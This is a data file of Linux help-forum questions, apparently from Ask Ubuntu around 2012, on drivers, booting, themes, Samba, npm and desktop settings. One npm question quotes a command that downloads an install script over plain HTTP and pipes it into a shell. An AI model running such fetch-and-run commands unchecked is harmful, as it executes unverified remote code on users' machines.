102919	some devices do n't work on 3.0 usb port ?	my laptop a hp dv6-1149wm has 2x 3.0 usb , and 2x 2.0 usb ports . some devices will work fine on both , like flash drives , but some other devices , like my ipod , and my android phone will not work on my 3.0 ports . they just do n't show up at all , lsusb shows nothing , nor syslog . any idea why it is device-specific ? or is there any way to force my 3.0 ports to act as 2.0 for the time being ? i do n't have any 3.0 devices .
102923	can i use gnome2 themes in gnome3 ?	i have been using ubuntu for years . i love it and am a big fan of gnome 2x and gtk 2x . i have lots of themes installed which worked on those former versions . however , since the implementation of gnome3 and gtk3 the old gtk/gnome style themes no longer work . i went to usr/share/themes and noticed that there are major differences in the ways themes are handled . to see the difference you just need look at the radiance theme and see the difference between the two schemes . since there is such a difference , will there be a tool to convert old themes to the new standard or are there more themes on their way ?
102924	list samba shares and current users	looking for a simple way to do this from the command line . list samba shares and the users who can access each of them . list samba shares and the users currently connected to them . list samba shares and every connection ( log , including user ) that has been established to each of them . any ideas ? anything you use that 's currently available that will give me the bits i need to put this together ? cheers !
102926	using synergy on desktop and server os	ok , so i want to install synergy on both the ubuntu desktop and server editions . technically the server would not have a mouse but i 've heard of a program called gpm that you can install . so , is it possible to run synergy on both a desktop and server system ?
102928	how to export to aac audio from audacity ?	exporting to mp3 audio from audacity works fine , but exporting to `` m4a ( aac ) '' results in nothing . no file is created or whatsoever . i can see that it depends on `` ffmpeg '' library to work , but the application winff ( which also makes use of this library ) is working fine to me . do i need to install anything else ?
102932	usb wireless card atheros ar9271 not working in virtualbox	i can not get my card ( tp-link tl-wn722n ) to work on backtrack 5 r1 ( kernel 2.6.39.4 ) , installed on virtualbox # lsusb bus 001 device 004 : id 0cf3:9271 atheros communications , inc. ar9271 802.11n bus 001 device 002 : id 80ee:0021 virtualbox usb tablet bus 001 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # iwconfig lo no wireless extensions . eth0 no wireless extensions . i have installed compat-wireless-2012-02-06 and selected ath9k_htc drivers . any clues ? i can post anything else you need .
102935	how do i update to python 2.7 ?	i am using ubuntu 10.10 which comes by default installed with python 2.6 , however some applications that i want to use require 2.7 and i want to update . how would i go about doing this ?
102937	how to manage a large mail archive ?	i have a few gigabyte of old mail , mostly unsorted as nnml format ( i.e . gnus , with one file per mail ) . how can i turn that mail into something useful , i.e . something i can search and browse easily and fast ( i.e . grep takes far to long ) . i have no need for a full mail client , just the archive management part of it .
102944	un bootstrapping a juju/orchestra environment	i think my juju environment in my orchestra server is broken , and i want to do the bootstrap process again . basically , i 'd like to run : juju bootstrap and not get : 2012-02-09 19:51:48,503 info juju environment previously bootstrapped . how can i reset things , and re-bootstrap ? i also noticed that juju installed the zookeeper on node1 of my environment . is there a way to get juju to install zookeeper on the orchestra server ?
102954	ubuntu 10.10 running slow , going grey and shaking	my computer : 3200+ amd sempron processor 512 mb 100gb from time to time ubuntu runs incredibly slow , the screen goes grey and shakes up and down when i 'm browsing a site . i hope this enough information to diagnose the problem .
102956	how do i install an asus usb-n53 wifi adapter ?	i bought an asus usb-n53 wireless-n dual-band usb wifi adapter . it does not install on my ubuntu 11.10 system automatically . i can not figure out a way to get it installed . any advice ?
102958	is there an update manager for kubuntu ?	is there a default update manager for kubuntu ? if there is n't can i install the ubuntu update manager ? i know i can use sudo apt-get update & & sudo apt-get upgrade but sometimes i get something like : 0 to install 0 to remove , 0 new , 0 upgraded and 3 not upgraded any way to fix this ? thanks .
102960	do the xserver-xorg-video-intel drivers support dual monitors with intel hd graphics 3000 ?	i just assembled a new computer with an intel core i7-2600k cpu and i am using the integrated intel hd graphics 3000 graphics processor . i have an asus p8z68v-le mother board that has a vga , dvi and hdmi output . i have a samsung monitor to the dvi port and an acer monitor connected to the hdmi port . both monitors are detected by the displays utility and the acer monitor works just fine , but i ca n't get the samsung monitor to work when i am at my unity desktop . when i first installed ubuntu , the displays utility showed both monitors as enabled with mirrored displays . the samsung monitor appeared to be getting a video signal , but the display was blank . at the moment , i have the acer monitor enabled and samsung monitor disabled in the displays utility and the samsung monitor has gone to sleep . if i try and enable both monitors with a mirrored display again ( using a resolution of 1680x1050 ) , i get a dialog box showing with the error `` could not assign crtcs to outputs '' . if i try and enable the samsung monitor and use and extended desktop across the two displays , the samsung monitor wakes up and i can drag windows over to it , but it shows nothing on the screen . when the computer boots , both monitors show the same content at the efi screen and at the grub screen . both monitors show a light purple background while ubuntu loads . i only seem to have a problem with the second monitor after i get to the desktop screen . additionally , if i boot into windows , both monitors work with an extended desktop without any problem . hopefully someone can shed some light on this issue . i thought i better post here before reporting a bug against xserver-xorg-video-intel . thanks ! : )
102962	installing ubuntu and grub on new hdd	i just aquired a new hdd to my windows 7 system and want to install ubuntu 11.10 and grub on it . i have a livecd but cant make it work . when i chose the new hdd for installation ( sdc1 ) it says `` no root file system is defined . please correct this from the partitioning menu . '' what should i do to make it work_ this is the first time i try to install ubuntu so i have no previous experience of it .
102967	can i delete one of my old ubuntu folder ?	i installed ubuntu on both of my laptop and desktop and logged in ubuntu one using the same account.now on my laptop i can see the sync folder of my desktop although i have already uninstalled ubuntu from my desktop.how can i delete the left folder from my ubuntu account ?
102970	whats the difference between documentroot and directory	plaese till me what is the difference between documentroot and directory in default file default file in apache2 has three blocks documentroot /var/www in me server /sda1/htdocs < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www > in my server sda1/htdocs > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > may i use just these two in sda1/htdocs directory documentroot /sda1/htdocs < directory /sda1/htdocs > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > with many thanks
102972	how can i use transmission-daemon with a download folder on a ntfs file system ?	i have a small partition for linux and a big partition that is ntfs so i can share files with my windows installation . i want to use transmission-daemon ( this is a console-only installation ) and i want it to download in the ntfs partition . the problem is that transmission reports `` permission denied '' when trying to save the downloaded torrents . i assume this is because all permissions on ntfs are rwxwrx -- - ( which means no access for other users , and transmission-daemon is other user ) . the worst part is that i can not chmod o+rwx /media/ntfspartition/torrents/ -- it just does n't work , it 's ntfs . in this particular case neither can i use transmission-gtk so , how can i make transmission-daemon download to a ntfs folder ? thanks in advance for your help .
102975	ubuntu x64 installation fails on reboot ?	i 've got a brand new gateway sd-x with : 4gb ram 1tb hdd amd radon hd 6500 graphics amd quad core processor ( not sure about the exact name for it ) i have tried installing ubuntu x64 for the third time now . each time i do this , the grub menu never correctly installs and leaves me with this : error : unknown filesystem recovery > it never seems to have any command whatsoever , no sudo , no reboot , nothing . on top of all of this , the installation process ( although taking a quick 30 minutes to fully install ) never properly reboots . it gets this : received message 15 , system going for a reboot now ! ... ... caught message 15 , going for reboot . and hangs from that point on , not rebooting at all even when left for a full 12 hours . i have absolutely no clue what could be causing this . i have tried sgd , updating through the terminal , configuring through live-cd and installation cd , tried the windows recovery cd , windows installation cd , absolutely nothing has helped so far ! i ca n't load from ubuntu , i cant load from win7 , i ca n't even load from web-os ! everything still exists , but the messed up grub menu block everything , and the failed reboot does n't help either . any help would be deeply appreciated . sincerely , g^2
102978	nodejs npm installation error	i am doing this with root privileges . but still i am getting access denied error . hrishikesh @ hrishikesh-ubuntu : ~ $ sudo curl http : //npmjs.org/install.sh | sh [ sudo ] password for hrishikesh : % total % received % xferd average speed time time time current dload upload total spent left speed 100 7881 100 7881 0 0 12574 0 -- : -- : -- -- : -- : -- -- : -- : -- 37174 tar=/bin/tar version : tar ( gnu tar ) 1.25 copyright ( c ) 2010 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > . this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . written by john gilmore and jay fenlason . install npm @ 1.1 fetching : http : //registry.npmjs.org/npm/-/npm-1.1.1.tgz 0.6.10 1.1.1 cleanup prefix=/usr/local all clean ! npm err ! error : eacces , permission denied '/usr/local/bin/npm' npm err ! npm err ! please try running this command again as root/administrator . npm err ! npm err ! system linux 2.6.38-13-generic npm err ! command `` /usr/local/bin/node '' `` /tmp/npm.2959/package/cli.js '' `` rm '' `` npm '' `` -gf '' npm err ! cwd /tmp/npm.2959/package npm err ! node -v v0.6.10 npm err ! npm -v 1.1.1 npm err ! path /usr/local/bin/npm npm err ! code eacces npm err ! message eacces , permission denied '/usr/local/bin/npm' npm err ! errno { } npm err ! npm err ! additional logging details can be found in : npm err ! /tmp/npm.2959/package/npm-debug.log npm not ok npm err ! error installing npm @ 1.1.1 npm err ! error rolling back npm @ 1.1.1 error : eacces , permission denied '/usr/local/bin/npm' npm err ! error : eacces , permission denied '/usr/local/bin/npm' npm err ! npm err ! please try running this command again as root/administrator . npm err ! npm err ! system linux 2.6.38-13-generic npm err ! command `` /usr/local/bin/node '' `` /tmp/npm.2959/package/cli.js '' `` install '' `` -gf '' npm err ! cwd /tmp/npm.2959/package npm err ! node -v v0.6.10 npm err ! npm -v 1.1.1 npm err ! path /usr/local/bin/npm npm err ! code eacces npm err ! message eacces , permission denied '/usr/local/bin/npm' npm err ! errno { } npm err ! npm err ! additional logging details can be found in : npm err ! /tmp/npm.2959/package/npm-debug.log npm not ok it failed hrishikesh @ hrishikesh-ubuntu : ~ $ what do i do ?
102985	how to make usb modem for internet work with ubuntu ?	i have one usb dongle for internet access initially i was using it with windows now i have installed ubuntu 11.10. and the usb dongle is not working.it has inbuilt card reader too and that working fine.i dont know what to do . help guys . here is the screenshot for lsusb command
102988	can not read external hard disk folders created in ubuntu	i am experiencing a problem . i tried to plug in my external hard disk on ubuntu . i copied in to it some folders ( created on ubuntu ) with files in them . then , i plugged it on windows and i was n't able to copy or modify any of the copies folders or sub-folders . i could access my files ( and modify them ) , but i could n't modify or copy any of the folders or sub-folders . i tried formatting my computer 's and the external hard disk , that did not make a difference . what should i do ? wimvds -- > thanks for your answer , first of all : ) yes ! i did . i always use `` unmount '' on linux as well as on windows ... misery -- > no errors are promoted during the copy process . what do you mean by saying `` attributions '' ? ? : /
102990	error message when open terminal	this appears when i open the terminal : bash : export : `= ' : not valid name bash : export : `/home/ ( my account name ) /bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/ ( my account name ) /bin ' : not valid name i 'm using ubuntu 11.10 i386 , and i think i messed up with repositories or something .
102995	what is the best printer for ubuntu ?	i want to buy a cheap printer to use with my ubuntu laptop . it is ok if the printer would be black and white . the main thing i want is a plug and play feature - no specific drivers , no set ups and etc . do you have any suggestions ?
102999	cancel process with ctrl + c will not work in terminal	i have just got myself a ubuntu server and for some reason the ctrl + c will not kill the process i am running . i have run this command on two terminals cygwin and putty and logged in using ssh . i can use the command locally and this is not a problem and also on other machines using solaris . i have read some other posts on this site relating to this issue , however , my issue is still not resolved . as the command works locally i am fairly confident that is not something in bash that needs to be set . ( i use bash on all the machines i use ) . i am not trying to close processes like man or less using this command just scripts and standard processes where you expect it to work . i have also tries ctrl + z and that does not work properly so not sure why it wont pick up any of these very useful commands . this is highly annoying for me . i would like to learn as much as i can about ubuntu as i have very little experience with it , if you have a solution can you include as much detail as possible ? here is my stty -a : speed 38400 baud ; rows 24 ; columns 80 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = m-^ ? ; eol2 = m-^ ? ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel -iutf8 opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke
103003	x server crashes everytime a touchpad , mouse or wacom is used	one day ago i booted up my laptop – which was fine when i shut it down the day before – and all of a sudden every time i touch the touch-pad my screen flickers a few times and and i 'm back at the log-in screen . it took me a while to figure out it was my touch-pad . it seemed random at first . i tried my mouse , my wacom tablet and alt-space > m all made x server crash . i have no idea where to look . all i know is that i would love to have this fixed because navigating keys only starts to become a pain . as requested last part of my xorg.0.log : [ 82535.673 ] ( ** ) option `` xkb_layout '' `` us '' [ 82535.673 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event0 ) [ 82535.673 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 82535.674 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/even t2 ) [ 82535.674 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 82535.674 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 82535.674 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 82535.674 ] ( ** ) sleep button : always reports core events [ 82535.674 ] ( ** ) sleep button : device : `` /dev/input/event2 '' [ 82535.674 ] ( -- ) sleep button : found keys [ 82535.674 ] ( ii ) sleep button : configuring as keyboard [ 82535.674 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/ pnp0c0e:00/input/input2/event2 '' [ 82535.674 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : key board ) [ 82535.674 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 82535.674 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 82535.674 ] ( ** ) option `` xkb_layout '' `` us '' [ 82535.681 ] ( ii ) config/udev : adding input device hda sis966 mic ( /dev/input/ev ent7 ) [ 82535.681 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 82535.682 ] ( ii ) config/udev : adding input device hda sis966 headphone ( /dev/in put/event8 ) [ 82535.682 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 82535.683 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event4 ) [ 82535.683 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keybo ard catchall '' [ 82535.683 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 82535.683 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 82535.683 ] ( ** ) at translated set 2 keyboard : always reports core events [ 82535.683 ] ( ** ) at translated set 2 keyboard : device : `` /dev/input/event4 '' [ 82535.683 ] ( -- ) at translated set 2 keyboard : found keys [ 82535.683 ] ( ii ) at translated set 2 keyboard : configuring as keyboard [ 82535.683 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/ input/input4/event4 '' [ 82535.683 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyb oard '' ( type : keyboard ) [ 82535.683 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 82535.683 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 82535.683 ] ( ** ) option `` xkb_layout '' `` us '' [ 82535.684 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( / dev/input/event6 ) [ 82535.684 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpa d catchall '' [ 82535.684 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catc hall '' [ 82535.684 ] ( ii ) loadmodule : `` synaptics '' [ 82535.685 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 82535.685 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 82535.685 ] compiled for 1.10.4 , module version = 1.4.1 [ 82535.685 ] module class : x.org xinput driver [ 82535.685 ] abi class : x.org xinput driver , version 12.3 [ 82535.685 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad ' [ 82535.685 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 82535.685 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 82535.685 ] ( ** ) option `` device '' `` /dev/input/event6 '' [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : x-axis range 1472 - 5472 [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : y-axis range 1408 - 4448 [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : pressure range 0 - 255 [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : finger width range 0 - 15 [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : buttons : left right [ 82535.685 ] ( -- ) synps/2 synaptics touchpad : touchpad found [ 82535.685 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 82535.685 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio4/ input/input6/event6 '' [ 82535.685 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchp ad '' ( type : touchpad ) [ 82535.685 ] ( ** ) synps/2 synaptics touchpad : ( accel ) minspeed is now constant d eceleration 2.5 [ 82535.685 ] ( ** ) synps/2 synaptics touchpad : maxspeed is now 1.75 [ 82535.685 ] ( ** ) synps/2 synaptics touchpad : accelfactor is now 0.040 [ 82535.686 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration schem e 1 [ 82535.686 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 82535.686 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 82535.686 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 82535.686 ] ( ii ) synps/2 synaptics touchpad : failed to open grail , no gesture s upport [ 82535.686 ] ( -- ) synps/2 synaptics touchpad : touchpad found [ 82535.686 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( / dev/input/mouse0 ) [ 82535.686 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 82549.055 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82549.078 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82549.085 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82549.091 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.044 ] ( ii ) synps/2 synaptics touchpad : failed to open grail , no gesture s upport [ 82763.044 ] ( -- ) synps/2 synaptics touchpad : touchpad found [ 82763.135 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.150 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.168 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.311 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.325 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm [ 82763.341 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-0f09d839ac4ad7c53f99d8c 8c1fe74a1cb4e3d19.xkm
103004	i installed cinnamon in virtualbox but it does n't start	i installed cinnamon two days ago in ubuntu doing this : sudo add-apt-repository ppa : merlwiz79/cinnamon-ppa sudo apt-get update sudo apt-get install cinnamon cinnamon-session cinnamon-settings but when i try to start a new session in ubuntu with cinnamon , it starts gnome classic instead cinnamon . i do n't know why , but could it be possible because there 's no cinnamon-session and cinnamon-settings in the repository ? i have watched videos of the installation and there was no problem , but when the videos were recorded there were those packages . i just tried to install gnome shell and it happens the same thing . i can run unity 3d and 2d . i 'm using virtualbox , but i do n't think that could be the problem , right ? ( i 'm using ubuntu 11.10 64 bits )
103005	how would i go about installing an avertv hybrid volar hx ?	how can i install the driver to get my avertv hybrid volar hx working on brand new ubuntu 11.10 computer ? i'am a newby in linux world but ubuntu looks great . please give me a hand !
103006	how to display time in the top panel ?	i thought i already had the time up there in the top bar , and it may have been so in previous ubuntu versions ( do n't remember , my ubuntu laptop is just one of three computers i use ) . only that i just noticed - me being someone who never wears a watch , has the cellphone turned off 95 % of the time and relying on the computer to tell the time - that there is no time being displayed anywhere , and i had expected it in the top bar on the unity desktop . i searched around but found no obvious solution , but i 'm sure someone immediately knows how i can get my time ( back ? ) into the top bar ?
103010	how to install software into the home partition ?	i have read some article about home partition in ubuntu but i do n't know why it is used widely . because software i have installed via ubuntu software center or deb package , they all automatically install into root partition like /opt , /usr or something like that . anybody can give me some suggestions ?
103012	system goes slow randomly . continues to run well when moving with mouse	i have noticed this mainly when playing flash games in my firefox or playing x-com in dosbox . game just runs fine , but then suddenly it slows down to crawl . when i touch my touchpad and move the cursor around , it goes good again . but when i let go of the touchpad , it goes to crawl again .
103013	recommended way of packaging a boost : :python module ?	i have a one-file boost : :python module which is compiled using a one-line makefile . what is the recommended way of packaging it ? distutils ? makefile ? cmake ? use cdbs then ? are there some documents on the subject ?
103014	wireless detected but ca n't connect to network , wifi card intel pro wireless n100 bgn	thanks in advance , i installed linux mint kernel 3.0.0-12 x64 , wireless is detected and i configure it in network manager but ca n't coonect , there are the results of command line : $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off $ sudo lshw -c network** *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:51 : c9 : d6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:48 memory : d7400000-d7401fff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : c0 serial : 48:5b:39:99:8f:16 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:51 memory : d3800000-d383ffff ioport:8000 ( size=128 $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no thank you .
103015	how do i check if last shutdown was clean ?	how can tell that my last shutdown was properly done in ubuntu 11.10 or if the machine was powered off before shutting down the os ?
103016	how to trigger a program at shutdown	how to trigger a program when shutdown occurs and trigger the another program when login occurs in ubuntu
103021	how to open word 5.0 files ?	i tried libreoffice but failed . i used the file command , but it only recognizes the file as `` data '' . is there a way to open a very old format like a word 5.0 file ? after i use catdoc , it shows this in vim : trying to use dosbox to install word :
103022	how to enable grilo upnp plugin in rhythmbox ?	the newest version of rhythmbox ( 2.95 ) should have a grilo upnp plugin , but i ca n't find it in rhythmbox and it is not enabled or available by default . i installed rhythmbox 2.95 according to this instruction in ubuntu 11.10 . the rhythmbox-plugin-coherence is not in the normal repositories anymore and so i thought it would be great to have the new rhythmbox version with pre-installed ( ? ) grilo plugin instead of installing from another repository . or do i need to install the grilo plugin with another repository ( ppa : grilo-team/ppa ) in ubuntu ? update july 2012 : did anybody try it with rhythmbox 2.96 ( or via ppa rhythmbox 2.97 ) in ubuntu 12.04 and the the grilo plugin ( from ppa : grilo-team/ppa ) ? with the normal install of rhytmbox 2.96 and 2.97 ( without additional grilo plugin from the ppa : grilo-team/ppa ) i have not seen any upnp support . i have not had time to install the grilo plugin yet . update october 2012 no grilo upnp plugin with rhythmbox 2.98 ( via ppa ) .
103023	using docky as launcher	i was using gnome do in natty , with docky as launcher . now i see that docky and gnome-do have separated , and i wonder : is it possible to use docky as launcher ? is there a way to summon docky with a key combination and then start typing the name of an application and have docky guess it and open it for you ? thanks !
103027	installing tomcat from repo with java from oracle	since java 6 from oracle is not supported with ubuntu repositories anymore , i installed it by downloading the package from java.oracle.com , unpacking it in /opt and adding symlinks in /usr/bin . now i need to install tomcat6 and i would really like to use the repository for it ( for the benefits of updates , default configuration and dir breakdown tailored for ubuntu etc. ) . unfortunately , i do n't see a way to do it without installing openjdk . how can i install tomcat6 from repository in this configuration , or tell ubuntu that i already have java and i 'm happy with it thank you very much ? do i have to install tomcat ( and all other java-dependent packages ) by downloading them from their respective websites , unpacking and adding links myself ?
103029	what triggers file system check ?	what are the conditions that trigger file system check at system startup in ubuntu 11.10 ?
103036	language support does not run ( crashes ) in 10.04	in lucid 10.04 , while trying to get spell-checking running in openoffice , i discovered taht i can not open my language support dialog . system - > administration - > language support it flashes up on the screen , shows a progress bar , and immediately disappears as the progress bar gets to the end ... i 've uninstalled and re-insatalled language-selector-common language-selector ubuntu-standard , but it has n't made any difference . here is the stderr output , from running /usr/bin/gnome-language-selector in the terminal . i ca n't figure it out , but maybe someone can work out what the problem is . /usr/lib/python2.6/dist-packages/languageselector/gtk/gtklanguageselector.py:803 : gtkwarning : gtk_cell_view_set_cell_data : assertion `cell_view- > priv- > displayed_row ! = null ' failed cell = combo.get_child ( ) .get_cell_renderers ( ) [ 0 ] traceback ( most recent call last ) : file `` /usr/bin/gnome-language-selector '' , line 32 , in < module > options=options ) file `` /usr/lib/python2.6/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 191 , in __init__ self.updatelocalechoosercombo ( ) file `` /usr/lib/python2.6/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 63 , in wrapper res = f ( *args , **kwargs ) file `` /usr/lib/python2.6/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 818 , in updatelocalechoosercombo defaultlangname = self._localeinfo.translate ( defaultlangcode , native=true ) file `` /usr/lib/python2.6/dist-packages/languageselector/localeinfo.py '' , line 169 , in translate l = filter ( lambda k : k.startswith ( macr [ 'lcode ' ] ) , self.generated_locales ( ) ) file `` /usr/lib/python2.6/dist-packages/languageselector/localeinfo.py '' , line 110 , in generated_locales macr = macros.langpackmacros ( self._datadir , tmp ) file `` /usr/lib/python2.6/dist-packages/languageselector/macros.py '' , line 87 , in __init__ ( self [ 'lcode ' ] , self [ 'ccode ' ] ) = locale.split ( '_ ' ) valueerror : too many values to unpack
103037	what is the easiest , most effective backup system for ubuntu servers ?	i 'm trying to backup my /var/www/ folder , mysql , and any other special documents like in the /etc/apache2/ folder . does anyone have any solutions for backup software ? maybe something that 's cronjob-able ?
103038	how to move a file/window from one desktop to another desktop ?	i 've updated the system to ubuntu 11.10 and set gnome shell as default gui . now i can not move files from one desktop to another . let me illustrate this . i used to have thunderbird maximized on desktop 1 . when i create a new email and want to add attachments to it , i went to another desktop ( desktop 2 or 3 ) , grabbed the file from it , moved it to the left side of screen which made the screen rotate to desktop 1 , and then just dropped the file into an email message . example no.2 . the same procedure was when i wanted to move an open screen of some app from one desktop to another . with this new gnome shell , desktops do not rotate left and right , but up and down . if i grab a file on one desktop and move it to the top/bottom , the screen does not rotate at all . of course , the same is with the left/right side . so , how can i made gnome shell rotate desktops when i touch one side of the screen ( either top/bottom or left/right ) ? has this been implemented at all ? ps . i know that i can move screens via desktop shortcuts . however , they are useless when i want to move files . edit i found a way to move files . grab it , move to upper left corner , navigate to the right desktop , touch some windows on that desktop to get focus and then drop the file into it .
103043	how to create swap partition on already installed ubuntu ?	i have already installed ubuntu 11.04 without any swap partition . now i want to create swap partition which should be utilized by this os . i have tried creating one by partitioning but ubuntu can not use this swap memory and swap usage remains unused . please tell me how to make it usable by ubuntu .
103050	how to bring the clock back to the center in gnome-shell ?	i am using gnome-shell on ubuntu 11.10 . for some reason , after i added the usual extensions ( weather indicator , system monitor etc ) the clock moved to the right - i did not install an extension for it to do so ; it just did . how can i get the clock back to the center ?
103056	how to connect rabbitvcs to svn server ?	i installed rabbitvcs using the ubuntu software center but do n't see how to make it connect to my svn server . i would think that a right click on a folder would bring rabbitvcs up as an option but do n't see any reference to rabbitvcs in the right click context menu .
103065	why do i get 'hdio_get_identity failed ' message when booting with external usb hard drive ?	i 've installed ubuntu 11.10 on an external usb ( 2.0 ) hard drive ( /dev/sdb1 ) but when ubuntu starts i get a message that says : ata_id [ 279 ] : hdio_get_identity failed for '/dev/sdb ' : invalid argument where i made a mistake ? the first hd contains windows 7 ( the official os of my packard bell notebook ) .
103068	remove editable address bar in nautilus	ubuntu 11.10 , classic gnome shell . some time ago i set editable address in nautilus using this way which was described at this question on superuser : gconftool-2 -- type=boolean -- set /apps/nautilus/preferences/always_use_location_entry true now i want to get default behavior back . i tried this : gconftool-2 -- type=boolean -- set /apps/nautilus/preferences/always_use_location_entry false but it does n't help . how do i get back to the default behavior ?
